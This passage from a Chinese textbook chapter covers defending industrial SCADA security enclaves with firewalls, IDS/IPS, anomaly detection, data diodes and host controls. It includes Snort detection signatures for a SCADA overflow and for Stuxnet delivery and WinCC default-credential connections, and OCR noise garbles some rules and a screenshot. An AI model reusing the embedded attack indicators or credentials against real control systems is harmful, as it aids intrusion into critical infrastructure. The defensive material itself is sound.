地址为变量,检测一个目标设备的流量是否在定义 的控制系统安全域内: alert tep any any ->$ControlSystem_Enclave01_Devices 当已经定义完成安全域及其相关的变量,就可以使用安全边界条件和主机安 全设备保护安全域。 5.1.2 保护安全域的边界 围绕已经定义的安全域建立封装安全载荷可以直接防御非授权访问安全域中 的系统,并有效阻止安全域中的系统从安全域内部访问外部系统。为建立电子安 全边界,并有效地保护安全域内外的网络流量,必须确保两个技术前提: ① 所有进出安全域的流量必须强制通过一个或多个已知的网络连接环节,以 便于监视和控制。 ② 在这些网络连接过程中必须设置一个或多个安全设备进行防护。 对每个安全域而言,应该选择合适的安全设备,并实现使用下面的一些建议。 1)合理地选择安全域边界安全防护系统 最简单情况下,所有类型的主机防火墙都是必需的。入侵检测系统、入侵防护 系统和多种专用的集成安全防护设备,例如统一威胁管理(UTM) 设备、网络白名 单设备、应用程序监视设备,工业控制系统协议过滤器等可以提供额外的安全防护 能力。通常情况下,安全域的危险程度反映了安全需求的急迫程度。表5.1 将安 全域的危险程度映射到 NERC CIP和 NRC CFR73.54 标准所规定的安全措施要求 中,也包括超出这些安全措施标准要求范围之外的安全增强建议。 表5.1推荐在每个安全域边界上使用防火墙和入侵检测系统。这是因为防火 墙和入侵检测系统设备完成不同的功能,防火墙只允许符合某些条件的流量通过 边界;而入侵检测系统详细检查允许通过的流量,目的是发现带有恶意攻击意图 的、“貌似合法”的流量,这些恶意攻击意图包括漏洞利用代码、病毒程序等,这些 有问题的流量通过多条合法的通道进行传输。同时使用两种设备将带来两方面好 处:第一,允许入侵防护系统在所有允许通过防火墙的数据流中完成深度的包过滤;第二,防火墙限制了基于安全域边界参数定义所允许的数据流量,确保入侵防 护系统能将其有限的资源聚焦到流量分析上,进而确保更全面和健壮的入侵防护 系统规则得以执行。 表5.1 根据危险程度划分边界安全需求 危险程度 安全需求 建议的增强措施 4最高 NRC CFR 73.54:单向边界 NERC CIP 005:防火墙或IDS或IPS 应用层监视,防火墙,IDS和IPS 3 NRC CFR 73.54:单向边界 NERC CIP 005:防火墙或IDS或IPS 应用层监视,防火墙,IDS和IPS 2 NERC CIP 005:防火墙或IDS或IPS 防火墙、IDS和IPS 1 NERC CIP 005:防火墙或IDS或IPS 防火墙和IPS 0最低 NERC CIP 005:防火墙或IDS或IPS 防火墙和IPS 为提供更深程度的保护能力,可以使用深度包探测技术分析特定的工业控制 系统协议。这个过程可能需要使用专用的工业 SCADA 入侵检测系统或设计 SCA- DA 防火墙设备识别工业 SCADA 系统协议。或者使用工业 SCADA 系统专用协议 过滤器及应用程序监视工具等提供的深度包探测技术,对一个通信会话中产生的 所有数据包,进行基于协议和涉及多个数据包的应用程序内容的检测和分析,这种 技术机制提供更深层次地查看网络流量内容的能力。图5.14表示如何增强防火 墙、IDS/IPS 设备和应用程序会话内容监视系统的安全防护能力。[4] 最好 比较好 好 不好 应用层 表示层 会话层 传输层 网络层 链路层 物理层 IDS/IPS 防火墙 控制名单 VLAN 图5 . 14 通用安全设备的相对能力 在大多数重要领域,应用层会话监视提供了一种有价值的并且必要的保护方 法,因为他们能够检测底层协议的异常行为(例如,HTTP 内部的 base64 编码的应用程序码流,这种码流形式可以被许多高级持续性攻击(APT) 和僵尸网络利用) 和违反应用程序策略的行为(例如, 一个非授权的用户向 PLC 控制器注入新的配 置方式的尝试)。然而,除非监视非常简单的应用程序协议,预期出现的协议内容 一般将明显地打包在一个独立数据包或数据帧中,应用程序会话必须先于监视过 程进行重组,如图5.15所示。 按照次序所有的包都被检验 图5.15 应用层会话检测和深度包检测 保护等级最高的信息安全防护设备也许是单向数据网关,或者也被称为重定 向网关。单向数据网关的原理非常简单,主要指一种单向的网络连接设备,物理上 通常指由一根光纤两端连接的收/发对。工业控制系统网络中成对光纤的使用,确 保在包含工业控制系统设备的高敏感性网络中不会出现任何形式的非法数字通信 连接,而允许那些现场监视数据经过高安全性安全域到达后台的工业 SCADA 系 统 DMZ 区域。在实时存储高度敏感数据等应用例子中,单向数据网关的应用过程 是相反的,那些可以直接发送至安全域的信息被从物理上禁止从安全域中反方向 发送回去。 2)配置边界安全设备 一旦合适的安全产品被识别,它们必须被合适地安装和配置。幸运的是,识别 过程、建立和文档化记录能够简化这一过程。下述指南帮助配置防火墙、IDS/IPS 设备和应用程序监视器,使用之前“建立区域”中定义的变量。 3)防火墙配置指南 由防火墙控制的通信使用预先定义好的配置策略,代表性的策略有 “Accept (允许)”和“Drop(拒绝)”语句。大多数防火墙按先后顺序进行配置,例如开始阶 段定义范围较广的策略,如“Deny All”,该策略默认将禁止所有进入网络的数据 流。这种定义宽泛的规则有可能与后来更精细化的规则进行叠加限定。因此,下 述防火墙策略只允许单个IP 地址从防火墙外部利用80端口(HTTP) 通信。 基于工业SCADA系统安全域的信息安全技术及应用 第5, Deny All Allow 10.0.0.2 to Any Port 80 相对而言,确定应该如何配置工业控制网络中的防火墙较为容易。原因是工 业控制系统防火墙的特点是并不需要满足多种类型的应用程序和服务,而这一点 在企业级网络中是很难办到的。特别的,当针对特定安全域配置特定防火墙时,安 全域将限定在一定范围内,进而限定了防火墙策略的特性。正确配置工业控制系 统安全域防火墙的方法如下: ① 从定义双向的 Deny All 策略开始; ② 配置特定异常事件,使用预先定义的如同$ControlSystem_Enclave01_De- vices 和 $ ControlSystem_Enclave01_PortsServices 形式的变量; ③ 确认所有 “Allow 策略”已明确的定义(例如,不是 All 规则)。 配置防火墙的一个简单方法是可以遵循美国国家信息基础设施信息安全合作 研究中心 (NISCC) 发布的“数据采集与监视控制系统(SCADA) 和过程控制网络的 防火墙配置最佳实践导则”,并使用表5.2定义的区域变量。 表5 . 2 使用安全域变量的 NISCC 防火墙配置导则[45] NISCC建议 使用边界变量的规则例子 注释 从定义普遍排斥策略作为默认 策略开始 拒绝所有/不允许任何流量通过 作为默认策略,防火墙应该 明确禁止所有内部和外部 流量 控制系统环境和外部网络之 间的端口和服务应该根据具体 情况,被允许或授权 允许 10 . 2 . 2 . 120 端口162到 192.168.1.15端口162的通信 #允许SNMP跟踪从IP地址为 10.2.2.120的路由器到IP地址为 192.168.1.15的网络管理中心的通 信,由John Doe于2005年4月1日 授权 在防火墙配置文件中使用 的评论可以用于文档化记录 具体案例,许可或其他细节 所有“许可”规则应该包括IP 地址和具体的TCP/UDP端口。 如果事先有明确要求,可以将流 量限制到具体的IP地址或IP地 址范围 不可用 该导则可以通过使用 $ControlSystem_Enclave01_ Devices和$ControlSystem_En- clave01_Devices形式的策略得 到强制执行 大多数SCADA和DCS网络中 的流量都基于可以路由的IP协 议,TCP/IP或UDP/IP协议;因 此,所有非IP的协议报文将被 丢弃 不可用 通过在所有已定义规则内 使用$ControlSystem _En- clave01_PortsServices策略,只 有使用安全域允许协议的数 据包才能被防火墙接受,并且 所有其他非该协议的数据包 将会被防火墙通过总体拒绝 所有规则数据包的规则丢弃 (续) NISCC建议 使用边界变量的规则例子 注释 阻止直接从过程控制/SCADA 网络到企业网络的传输流量;所 有流量将在这些网络的DMZ内 终止 Deny [Not $Neighboring Enclavel, Not $Neighboring Enclave2]to $ControlSystem_Enclave01_Devices Deny $ControlSystem_Enclave01_De- vices to [Not $Neighboring Enclavel,Not $Neighboring Enclave2] 通过在每个安全域配置规 则明确禁止所有进出本安全 域的流量而不是其他相邻安 全域的流量,将阻止任何形式 的过渡性流量。所有流量需 要被中止,并使用一个属于本 地区域的设备重新建立连接 在DCS和工业SCADA系统的 DMZ之间允许使用的任何协 议,将明确禁止在工业SCADA 系统DMZ和企业网络之间使用 (反之亦然) 在企业网络和工业SCADA系统 DMZ之间的策略: Deny $ControlSystem_Enclave01_ PortsServices To $EnterpriseNetwork _Enclave01 _Devices 在工业SCADA系统DMZ和DC S之 间的策略: Deny $EnterpriseNetwork_Enclave01_ PortsServices to $ControlSystem_ Enclave01_Devices 这些规则执行“分离”协议,并 进一步阻止从通信源跨越安 全域的过渡性通信 只允许来自PCN或DMZ外界 的、并且拥有正确地由PCN或 DMZ设备分配的源IP地址 不可用 明确定义“拒绝所有”的策 略,并使用$ControlSystem _ Enclave01_Devices规则明确 定义已知的、行为规范的IP 地址,确保所有外部数据包都 来自一个正确的源IP地址。 防火墙也必须能够检测欺骗 型的IP地址。此外,使用网 络行为异常检测(NBAD)系统 监视工业控制系统网络行为。 此外,信息安全和事件管理 (SIEM),或日志管理解决方 案可以探测熟知的、来自一个 MAC地址或一些非常规设备 IP地址的行为 工业控制系统网络设备不允 许访问互联网 在互联网防火墙处配置策略: Deny [$ControlSystem _Enclave01_ Devices, $ControlSystem_Enclave02_Devices, $ControlSystem_Enclave03_Devices, $ControlSystem_Enclave04_Devices] 因为安全域中的所有设备 已经被识别和映射成为变量, 因而在互联网防火墙中应该 明确禁止这些设备 ( 续 ) NISCC建议 使用边界变量的规则例子 注释 工业控制系统网络不应该直 接连接互联网,即使是通过防火 墙连接也不允许 不可用 使用安全域的方法,绝不允 许工业控制系统网络直接连 接互联网 所有防火墙管理的网络流量 包括: (1)要么通过一个独立、安全的 管理网络(例如,带外)或通过 带有双因素认证的加密网络; (2)通过IP地址限制到具体的 管理站点 不可用 这个建议支持建立防火墙 管理安全域,使用之前在上一 章节“建立安全域”中描述的 方法。通过在安全域里设置 一个防火墙管理接口和管理 站,它隔离于其他的网络,流 量能保持分离和保护 4)入侵检测与防御系统(IDS/IPS) 配置指南 IDS 和 IPS 设备检查网络数据包中的恶意代码标志或漏洞利用程序的特征 量。入侵检测被指的是被动探测,入侵检测系统(IDS) 检查数据包并根据一系列 探测签名规则进行比对,当发现匹配时发布告警。入侵防御指的是主动检查,当网 络流量与入侵检测系统规则匹配时,入侵防护系统(IPS) 除了报警还将采取特定 操作。入侵检测系统的操作包括 Alert(生成用户消息和数据包记录),Log(数据包 记录),Pass(忽略数据包),当入侵检测系统的操作包括 Drop(丢弃数据包并记 录),Reject(丢弃数据包并重新初始化一个 TCP的重新设置过程来删除会话), sDrop(丢弃数据包但不做日志记录)时,表明该系统同时具备防御功能。此外,入 侵检测系统和入侵防御系统的规则都能够使用Activate 和 Dynamic 操作,前者激 活另一个规则,后者保持空闲直到一个 Activate 规则被激活。[46] 入侵检测系统和入侵防御系统设备都能够使用网络扩展端口或 tap 端口进行 离线部署,以及使用两个网络接口卡进行在线部署,如果入侵防御系统是在线部署 的,那么只能主动封锁网络流量。 收集入侵检测系统/人侵防御系统探测签名涉及入侵检测系统/人侵防御系统 策略,这些策略表明何种类型的威胁通过设备能够被检测到,同时产生安全威胁的 程度和范围。由于主动拦截恶意网络流量非常重要,网络管理人员可以通过分析 此过程中生成的入侵检测系统/入侵防御系统事件日志获取其他重要信息——包 括网络行为,更严重的威胁事件等。IDS/IPS 签名特征通常以防火墙规则类似的 形式出现,存在一个可识别的源和目的地址/端口,也有操作行为。此外,IDS/IPS 签名特征能够匹配特定数据包的内容,寻找数据包内与已知的攻击匹配的报文组 织模式。通常的IDS/IPS 签名特征语法遵循由美国 Snort 公司定义的、事实上的业 界标准,Snort 是由 SourceFire 组织创立的一种开源 IDS 项目[47]。 一个 IDS 签名特 征的例子如下: [Action][Protocol][Source [DestinationAddress][Destination Port][Rule Options] 该规则可用正确的语法表述如下: drop tcp 10.2.2.180→ 192.168.1.180(flags:<optional snort flags >;msg: “<message text>”;content:<this is what the rule is looking for >;reference: <reference to external threat source>;) 为了突出防火墙规则和 IDS/IPS 签名之间的差异,可以参考如下例子: drop tcp 10.2.2.180 →any any 没有任何规则选项,先前的规则在本质上是与防火墙规则 Deny 10.2.2.1port 80一样的,它阻止来自10.2.2.1地址的、80端口的所有流量,进而有效阻止用户 访问Web(通过HTTP协议的80端口)。然而,在规则选项内匹配数据包内容的能 力,使得 IDS/IPS 设备能够在更细粒度上控制流量,例如 drop tcp 10.2.2.180→any any(msg:“drop http POST”;content:“POST”;) 这条规则的功能是只丢弃从有问题的源地址而来的流量,与常规规则有所不 同。如果 HTTP流量包含一个 POST 请求(许多 Web 表单或应用程序通过 HTTP 尝试上传一个文件到 Web 服务器,都使用该 POST 方法)。 当进行防火墙配置时,确认有可能执行的IDS/IPS 策略是正确配置设备的第 一步。对防火墙而言,早期“建立安全域”阶段定义的安全域变量,是一个极有价 值的变量工具,用来定义简洁和高度相关的签名。然而,与防火墙从定义简单的 Deny All 规则开始不同,IDS/IPS 应该一开始定义“大范围”的规则(带有许多活动 签名),然后删掉安全域中的特定要求。正确配置 IDS/IPS 的方法如下: ① 从一个更健壮的签名集合开始,含有很多活动规则; ② 如果一种协议或服务在某个安全域内不被允许,则可以使用一条范围更广 的并且可以拦截所有源自该种协议或服务的所有流量的更宽松的规则,替换与该 种协议或服务相关的检测签名(例如,丢弃非授权的端口或服务)。 ③ 如果一种协议或服务在安全域内允许使用,则需要保留所有与协议和活动 服务相关的检测签名;3a. 要对所有活动签名,评估特定的行为,可以使用表5.3。 ④ 保证所有 IDS 签名的通用性并处于更新状态。 需要记住的是,IDS或 IPS 可以在单纯的被动模式下完成分析允许通过的流 量的功能,包括安全域中的流量(同一安全域内的两个设备之间的流量,而不跨越 安全域边界条件)。被动监听将生成告警和日志信息,这些信息能用于很多安全 管理中,包括取证调查、威胁检测以及合规报告。 IDS/IPS 规则应该使用前述“利用功能集合建立工业 SCADA系统安全域(建 立安全域)”中定义的变量裁剪成合适的安全域。使用var 命令定义典型 Snort 变 量的例子如表5.3所列。 表5.3 评估合适的入侵检测系统/入侵防护系统行为 允许的 端口或 服务 来源 目的地 服务标准 事件的 紧急程度 建议的 行为 注释 否 任意 任意 任意 任意 拒绝 没有明确允许的、安全域内 的所有通信都应该被禁止,从 而阻止未经授权的会话和 攻击 是 安全域内部 安全域内 高 任意 警告 主动阻止或拒绝在安全域 内起始和终止流量,可能影响 操作。例如,误报会导致合法 的工业控制系统流量被阻止 或拒绝 是 安全域 内部 安全域 内部 低 任何 警告或 通过 对于非关键服务,推荐使用 日志记录但并不是必须使用 的(Alert操作会提供有价值 的事件和数据包信息,将有助 于事后事件调查) 是 安全域外部 安全域内 高 低(从模糊 签名检测产 生的事件或 信息事件) 警告 很多检测签名定义的范围 很广,可以检测更多的潜在威 胁活动。这些签名告警的目 的仅仅是阻止发生非故意的 控制系统操作 是 安全域外部 安全域 内部 高 高(显而易 见的恶意软 件或被精确 调整的签名 检测到的事 件 ) 阻止,警告 如果关键系统或资产的内 部流量包含已知的恶意载荷, 这些流量应该被禁止通行以 阻止外部攻击事件或破坏 行为 是 安全域内部 安全域外 部(明确 允许的目 的地址) 任何 任何 警告 大多数流量看起来是合法 的。然而,告警和日志事件会 提供有价值的事件和数据包 信息,有助于事后调查 是 安全域内部 安全域外 部(未知 目的地址) 任何 任何 阻止或 重置 这些流量大多数看起来是 合法的。生成的警告应该被 快速地处理:如果事件是误报 的,必要的流量应该是无意中 被阻止的;如果事件是一个威 胁,则应该指明应该威胁所属 的安全域 var VARIABLE_NAME <alphanumeric value>. var命令的使用范围很广,或者以专用的 ipvar 和 portvar 形式,能够专用于 IP 地址和端口。按照前面章节“建立安全域”中描述的安全域方法,变量应定义 如下: ipvar ControlSystem_Enclave01_Devices[ 192.168.1.0/24, 10.2.2.0/29] var ControlSystem_Enclave01_Users [jcarson,jrhewing,kdfrog,mlisa] portvar ControlSystem_Enclave01_PortsServices [502,20000] 这些变量专门用来贯穿主动检测入侵检测系统/入侵防御系统签名过程中。 例如, 一种在国外著名的《渗透测试指南》(Metasploit framework)中提及的签名机 制,常用来检测已知的 SCADA 缓冲区溢出攻击,其变量形式定义如下(节选部分 内容): alert tep! $ControlSystem_Enclave01_Devices →$ControlSystem_Enclave01 Devices 20222(msg:“SCADA ODBC Overflow Attempt”;content:<long string in the second application packet in a TCP session>;reference:cve,2008-2639;refer- ence:url, http://www.digitalbond.com/index.php/research/ids -signatures/ ml111601/;sid:1111601;rev:2;priority:1;) 另外的例子是一种专门设计的、用于阻止“震网”病毒的特征变量标志。第一 个例子寻找“震网”病毒的初期的传播机制: 一种特殊的、经过WebDav 连接通道传 播的快捷图片文件;第二个例子探测Simens WinCC 的连接尝试,在“震网”病毒感 染的早期阶段使用。 tcp!$ControlSystem_Enclave01_Devices $HTTP_PORTS -$ControlSystem_ Enclave01_Devices any(msg:"Possible Stuxnet Delivery:Microsoft WebDav PIF File Move Detected”;flow:from_server;content:“MOVE”;offset:0;within:5;content: “ .pif”;distance:0;classtype:attempted -user;reference:cve,2010-2568;refer- ence:osvdb,66387;reference:bugtraq,41732;reference:secunia,40647;reference: research,20100720-01;sid:710072205;rev:1;) tep any any -any 1433(msg:“Possible Stuxnet Infection:Siemens Possible Ro- otkit.TmpHider connection attempt”;flow:to_server;content:“Server =|2e5c lWinCCl3bluid WinCCConnectl3blpwd =2W SXcder”;classtype:suspicious -login; reference:cve,2010-2772;reference:osvdb,66441;reference:bugtraq,41753;sid: 710072201;rev:2;) 5)值得推荐的工业控制系统 IDS/IPS 配置建议 工业控制系统 IDS/IPS 配置的基本建议包括主动阻止规则,其用途是: (1)阻止任何跨安全域边界的未定义的流量(在这里通信中断不影响合法服 务的可靠性)。 (2)阻止任何包含恶意病毒或预定义漏洞利用代码的流量通过安全域边界。 (3)检测和记录安全域内可疑或异常活动。 (4)记录安全域内正常或合法活动,有助于合规性检测报告。 功能分离和分离到安全域的程度越深,IDS/IPS 策略的精确性和有效性越突 出。 一些适合用于安全域边界的 IDS 和 IPS 基本规则如下: (1)阻止任何数量和长度错误的工业控制系统网络协议数据包。 (2)阻止进出任何尚未批准或未允许的其他安全域的网络流量。 (3)阻止任何在尚未被批准或未允许的安全域中探测到的工业控制系统网络 协议数据包。 (4)为了记录成功和失败的登录操作,告警任何形式的认证尝试。 (5)告警任何针对工业控制系统网络的端口扫描。 (6)告警任何有价值的工业控制系统网络协议功能代码,如: ①“写”功能,包括写文件或清除、擦除、重置诊断计数器的代码; ②“系统”功能,包括停止或重启设备的代码,包括禁止报警和警告的代码; ③“读”功能,请求敏感信息的代码; ④“报警”或“异常”代码或消息。 因为 SCADA IDS/IPS设备可能检测或触发工业控制系统网络协议功能代 码和命令,特殊设计的应用程序监视设备将更适合用来分析应用层协议的 内容。 6)基于异常的入侵检测[48] 到目前为止,仅仅讨论了基于IDS 和 IPS 系统签名特征的检测方法。然而,许 多IDS 和 IPS 系统也支持基于异常的检测。异常检测使用统计模型探测一些非常 规发生的具体时间,这种统计方法建立在那些不期望出现的行为可能就是一次攻 击行为的假设预期上。 各个厂家生产的、不同的基于异常检测技术的产品,其精确性不尽相同,因为 目前没有异常检测技术的标准。理论上,IDS 检测到的任何异常行为都能够用来 进行网络异常检测。因为网络流是高度可计量的,异常行为检测可以用来识别工 业控制网络中的设备如何并怎样进行异常通信。具有网络异常检测功能的系统能 够检测网络出口流量的突然增加,会话连接的显著增加,传输总字节数的陡增,目 的地址为唯一目的IP 地址的网络连接数量的突发增加,或其他可测量的网络标度 值的异常变化。 异常检测技术通常是有用的,因为该技术检测威胁时不需要明确定义的签名 标记。这使得异常检测系统能够在没有检测标签的情况下,识别零日(ODay) 漏洞 攻击或其他并不存在探测标记的威胁。但与此同时,异常检测技术存在误报率高 且数量庞大的趋势,因为任何网络行为的轻微改变都可能导致异常告警。正是由 于这个原因,基于异常的安全威胁检测技术主要用于被动式探测,生成告警信息而不是主动拦截可疑的网络流量。工业控制系统网络,特别是隔离划分明显的控制 系统安全域的网络行为的发展趋势是高度可预测的,因而异常检测技术更加可靠。 异常检测技术机制可能涉及“简单规则”检测系统,在这种情况下,尽管仍然 使用检测规则,但它们不需要完全匹配某种已经定义完整的签名标志。然而,不同 于常规的IDS规则,这种“简单规则”通常基于门限和/或统计偏差,例如下面的 例子: Total ByteCount from $Control_System_Enclave01_Devices increases by >20% 门限规则的一个例子是使用最小上限或下限,大多数可以通过异常检测系统 自动推导形成: Total Destination IPs >34 作为一个通用性的规则策略,异常检测机制监视到的网络流量变化类型特征 越丰富,异常检测规则产生误报的机会就越大。 使用信息加固工具,例如安全信息和事件管理(SIEM) 系统等,异常检测机制 也能跨设备之间使用,这种网络系统级的异常检测技术将会在本书后续章节中详 细讨论。 7)工业控制系统网络应用程序和协议的监视 因为许多工业控制系统网络运转操作由专用的工业控制网络协议进行,发送 命令,读写运行状态数据等通过控制协议完成。使用定义完善的功能代码,专用工 业控制设备可以借助防火墙、IDS、IPS 等技术增强需要跨网络通信完成的特定监 视操作。 除了检查工业控制系统网络协议内容(例如,DNP3.0 功能代码),应用程序本 身即管理这些控制协议如何使用的软件也需要被检查。对工业控制系统应用程序 监视的程度,也涉及会话内容检查,换句话说,当应用程序的内容(例如,HMI,Web 浏览器)存在于大量独立的网络数据包中时,该应用程序也应该被检查。并且所 有传输到PLC的文件的内容,通过Web 浏览器从升级服务器下载的病毒升级补丁 等也应该受到监视。应用程序监视器提供了一种范围非常广泛的、深入查看网络 流量是如何使用的机制,因而在那种控制系统、企业协议和应用程序都同时使用的 现场环境中特别有用。 许多具有应用程序或协议监视功能的专用安全设备也同样适用于工业 SCA- DA 系统和控制系统环境。截至目前,具有这种功能的设备包括 Tofino Industrial Security Appliance 和 Secure Crossing Zen Firewall,也包括其他应用广泛的企业级应 用程序数据监视器。前两种设备专门设计用来识别工业控制系统协议完成的操 作,阻止非授权操作。后一种设备涉及具有更加通用功能的企业级安全应用,该类 设备可能支持更加常见的工业控制系统网络协议。每种这类专用安全设备中都有 一定的防护强度和弱点,如表5.4所列。 表5.4 工业信息安全设备的对比 安全产品 功能 强度 弱点 规则应用实例 SCADA 防火墙 强制流量管理 策略 能够分离网络、端 口和服务 在“被允许”通过 的流量内不能有效 阻止隐藏的威胁或 漏洞利用程序 只允许TCP协 议502端口(Mod- bus TCP)的通信 SCADA IDS/IPS 检测通信流量内 的恶意病毒和漏洞 利用程序 阻止通过授权端 口和服务的漏洞利 用代码 “黑名单”方法只 能检测和阻止已知 的安全威胁 阻止Modbus数 据包中包含的已 知恶意代码 SCADA UTM 或混合式安 全设备 集成防火墙,IDS/ IPS,VPN和其他安 全功能 组合多种安全功 能,有利于单一产品 的“深度防御” 安全功能保留了 其各自组件的弱点 (如整体安全功能不 大于各个部分的总 和 ) 只 允 许 通 过 TCP协议的502 端口的带有“只 读”功能的代码流 量;只允许通过外 部 T C P 协 议 的 502端口、并通过 加密VPN到其他 工业SCADA系统 安全域的通信 基 于 工 业 SCAD A系统 内容的防火 墙或应用程 序防火墙 强制流量管理 策略 具有基于内容和 工业控制系统网络 协议的流量分离 功能。 只评估单个数据 包的内容(缺乏会话 重构或文档编码的 功能) 只允许完成“只 读”操作的Modb- us TCP功能 深度会话 监视(应用程 序内容监视) 会话重构;文件/ 内容解码; 文件/内容捕获 具有基于SCADA 内容的防火墙功能, 并将可视功能加入 整个应用会话和文 档内容中,进而探测 APT威胁和内部数 据窃取行为;在综合 型企业/工业区域 (例如SCADA DMZ 等),提供强壮的安 全保护能力 一般情况下,受 TCP/IP检测能力限 制,会话检测技术不 适合在单纯的工业 控制系统环境中部 署应用 在Modbus TCP 网络流量端口上 告警,而不是在 TCP协议的502 端口告警; 在 任 何 基 于 base64位编码的 内容中告警 网络白名单 只允许被定义为 “良好”的流量通过 通过只允许已知 的、“良好”流量通 过的方式阻止所有 恶意流量 需要正确网络行 为的合适基线 使得在网络运 行管理过程中,进 行合法的配置更 改变得更加困难 因为这类设备的高度专用化,配置变化情况复杂多样。通常情况下,具有 SCADA 协议检查能力的防火墙可能优化如下规则,用于阻止任何基于该协议的修 改配置文件或写寄存器,以及执行系统控制命令(例如设备重启)的操作: Deny [s ControlSystem_ProtocolFunctionCodes_Write , $ControlSystem_ProtocolFunctionCodes_System] 具有工业 SCADA 系统协议检查功能的 IDS 可能优化如下规则,该 IDS 将在 DNP3 数据包中查找特定的功能代码: tcp any any →$ControlSystem_Enclave01_Devices 502(msg:“DNP function code 15,unsolicited alarms disabled”;content:“115l”;offset:12;rev:1;) 相反的情况是,应用程序监视器进行完整的会话解码时,可能会使用与下面的 规则相似的语法,用于在应用程序数据流中检测“windows.LNK” 文件,该过程将 显示可能存在的 Stuxnet 传输连接尝试。 FILTER_ID=189 NORM_ID=830472192 ALERT_ACTION =log-with -metadata ALERT_LEVEL=13 ALERT_SEVERITY=10 DESCRIPTION =A Microsoft Windows .LNK file was detected EXPRESSION=(objtype ==application/vnd.ms -Ink) 8)数据二极管和单向网关 数据二极管和单向网关从物理上阻止一个光纤连接过程返回的通信连接,典 型的情形是通过物理拆除 RX optics 器件实现这种功能。在存在双向通信的应用 场景中,这两种模块提供完全的物理层安全防护。因为其中一个方向的连接不存 在,只有一个方向的通信,所以数据二极管实现真正的“空间隔离”。[49] 因为许多网络应用程序和协议需要双向通信条件(例如TCP/IP 协议,需要多 次握手和确认环节,从而建立并完成一次会话过程),当选择使用数据二极管时, 需要考虑确保保留单向数据传输路径,以便能够传输会话传输必需的数据流。为 了达到这样的目的,许多数据二极管供应商实现了基于软件的解决方案,而物理二 极管存在于两个服务器之间。这些服务器支持多种类型的双向应用,所以双向传 输要求能够在传输终端得到完全满足。但接收终端就可能出现欺骗原始传输方的 操作行为——本质上是在单向连接过程中进行欺骗应用程序的操作,防止这种情 形将导致在应用层和能够通过二极管或网关进行传输的服务层间增加额外的控制 过程。例如在单向网关上允许提供 DNP3.0 服务,如图5.16在单向网关上允许 DNP3.0 协议所示。由于数据二极管是物理层设备,不需要任何特别的配置,而通 信服务器却需要这些应用在数据二极管中正常工作之前完成正确的配置。 Watertall TX Configuralion hep 日 Ttensport Layem Advanced Seltings NIC Montoing Stream Keep Alive(1) UDP(1) -Multicast (1) Broadcast(1) TCP(1) RS232(1) ASDEXChert 日 IT Monlcing SNMP (1) Syslbg 田 SME OPC DA Client OPC HDA Client ( OPC HDA Server WMQ(1) PIPoint (1) PIAPS(1) GE Point (1) DNP3 Server(1) DNP3 Csent Modbus Chent -Modtut Server ModusDB ICCP Video RTSP HTIP Camere 2 Reitat Watetlal SME-DNP3 Server Charnels 115]Dnp3 server 1 Active CharnellD Channel nane Dno3 rerve 1 IP 1270.0.1 Bufiei sice iP Netwo/king Comection Type Remote IP Local Pat Remote Pot Funchon Master Addest Master User Num OutitationAdd Outitsion User Num Conzecuive Timeouts Fo Comms Fal PoH Delay MSec 0 Deete Pol Delay Set Pol Type Integily Irterval Autherticslion Daaink Keep Alve Interval me Unaolcked Responset| Debug Level Apoy 图5 . 16 在单向网关上允许 DNP3.0 协 议 5.1.3 保护安全域内部 根据定义,安全域外部边界有一个清晰的划分,能够被监视和控制;与此不同 的是,安全域内部是由一些特定设备和这些设备间的各种通信网络组成的。保护 一个安全域的内部主要通过一系列基于主机的安全机制实现,这些安全机制包括 控制终端用户对设备的认证,控制终端设备能够执行应用程序的种类。监视工业 控制系统安全域内部的主机之间的通信对检测威胁也是有帮助的,本书将会在后 续章节“工业 SCADA 系统安全域的监测”中详细讨论。 本节讨论的主机安全主要包括三个不同的域: (1)访问控制。包括用户认证和服务可用性。 (2)基于主机的网络安全。包括主机防火墙和主机入侵检测系统(HIDS)。 (3)反恶意软件系统。例如杀毒(AV) 软件和应用程序白名单(AWL)。 1)选择合理的内部安全防护系统 理想情况下,所有主机访问控制和主机网络安全防护措施应该部署在所有网 络设备中。然而,并非所有工业控制系统网络设备都能够运行额外的安全软件,在一些情况下,信息安全软件可能导致潜在的或无法接受的处理器开销。表5.5列 举了哪些工业控制系统设备能够运行常见的主机安全防护方法。 表5 .5 基于主机的信息安全机制的不同使用层次 设 备 适合的安全防护措施 人机界面(HMI)或类似设备运行现代操作系统,应用 程序对时间不敏感 (1)主机防火墙; (2)主机入侵检测系统; (3)杀毒软件或应用程序白名单; (4)禁用所有未使用的端口和服务 HMI或类似设备运行现代操作系统,应用程序对时间 非常敏感 (1)主机防火墙; (2)禁用所有未使用的端口和服务 PLC,RTU或运行嵌入式商用操作系统的类似现场设 备/装置 (1)主机防火墙或可用的主机入侵检测系统; (2)外部安全控制技术 PLC,RTU、IED或运行嵌入式操作运行环境的类似设备 外部安全控制技术 如果可能的话,每种安全防护技术机制(访问控制、网络安全和防恶意病毒程 序)的每个选项都应该使用。特别是在主机安全选项不太可能实现的地方,应该 使用外部安全控制机制。(注意:主要的工业控制系统设备生产商经常推荐或支 持使用特殊的主机安全技术,甚至可能支持退化测试以便用于验证授权工具。这 是一种非常重要的设计,特别是当遇到对时间敏感的应用程序时,时间延迟的影响 将非常明显。此外,许多工业控制系统资产可能对商业操作系统进行了适当的扩 展或修改,这可能会与一些主机安全解决方案产生冲突。因此,必须首先咨询工业 控制系统设备生产商,然后再安装商用的主机安全防护产品。) 2)主机防火墙 主机防火墙的工作过程与网络防火墙类似,在主机和任何关联网络之间起初 始过滤器的作用。主机防火墙基于防火墙特定的配置允许或拒绝进入防火墙内部 的流量,典型情况下,主机防火墙是会话感知型防火墙,允许控制不同的进出防火 墙的应用程序会话连接。 参考网络防火墙的情况,主机防火墙应该根据“防火墙配置导则”提出的原则 进行配置,从配置“Deny All”策略开始,Allow 策略应该只添加在特定端口和特定 资产使用的服务上。 3)主机 IDS 主机 IDS(HIDS) 系统如同网络 IDS一样工作,它们仅存在于特定资产中并监 视系统内部资产。 一般情况下,HIDS 设备监视系统设置和配置文件,应用程序和/ 或敏感文件。这些主机 IDS(HIDS) 系统设备不同于杀毒软件和其他主机安全防 护技术,在这些设备中可以直接进行网络数据包检查,故可以直接模仿网络 IDS的 行为:通过监视主机系统网络接口检测或阻止进入主机内部的安全威胁,HIDS 系 统因而能够使用“IDS/IPS配置导则”中提出的原则进行配置。因为 HIDS 系统也能用于检查本地文件,该术语有时也用于其他基于主机的安全设备,例如防病毒系 统或适当的主机安全防护措施等,并能提供重叠的安全功能。 根据网络 IDS的工作情况,HIDS 设备生成告警信息,详细描述所有违反预先 